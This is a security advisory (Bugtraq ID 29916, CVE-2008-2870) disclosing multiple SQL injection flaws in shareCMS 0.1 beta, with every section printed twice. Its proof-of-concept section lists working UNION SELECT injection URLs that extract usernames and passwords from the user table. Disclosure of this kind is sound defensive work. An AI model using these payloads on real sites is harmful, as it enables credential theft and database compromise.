shareCMS Multiple SQL Injection Vulnerabilities
BID:29916
Info
shareCMS Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 29916 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-2870 |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 24 2008 12:00AM |
| Updated: | May 07 2015 05:28PM |
| Credit: | CWH Underground |
| Vulnerable: |
shareCMS shareCMS 0.1 beta |
| Not Vulnerable: | |
Discussion
shareCMS Multiple SQL Injection Vulnerabilities
shareCMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
shareCMS 0.1 Beta is vulnerable; other versions may also be affected.
shareCMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
shareCMS 0.1 Beta is vulnerable; other versions may also be affected.
Exploit / POC
shareCMS Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following proof-of-concept URIs are available:
http://www.example.com/[sharecms_path]/event_info.php?eventID[SQLInjection]
http://www.example.com/[sharecms_path]/list_user.php?userID=[SQLInjection]
http://www.example.com/sharecms/event_info.php?eventID=-9999/**/UNION/**/SELECT/**/1,2,3,username,5,6,7,8,9,10,11,12,password/**/FROM/**/user--
http://www.example.com/sharecms/list_user.php?userID=-9999/**/UNION/**/SELECT/**/1,2,3,4,5,6,concat(username,0x3a,password),8,9,10,11/**/FROM/**/user--
Attackers can use a browser to exploit these issues.
The following proof-of-concept URIs are available:
http://www.example.com/[sharecms_path]/event_info.php?eventID[SQLInjection]
http://www.example.com/[sharecms_path]/list_user.php?userID=[SQLInjection]
http://www.example.com/sharecms/event_info.php?eventID=-9999/**/UNION/**/SELECT/**/1,2,3,username,5,6,7,8,9,10,11,12,password/**/FROM/**/user--
http://www.example.com/sharecms/list_user.php?userID=-9999/**/UNION/**/SELECT/**/1,2,3,4,5,6,concat(username,0x3a,password),8,9,10,11/**/FROM/**/user--
Solution / Fix
shareCMS Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].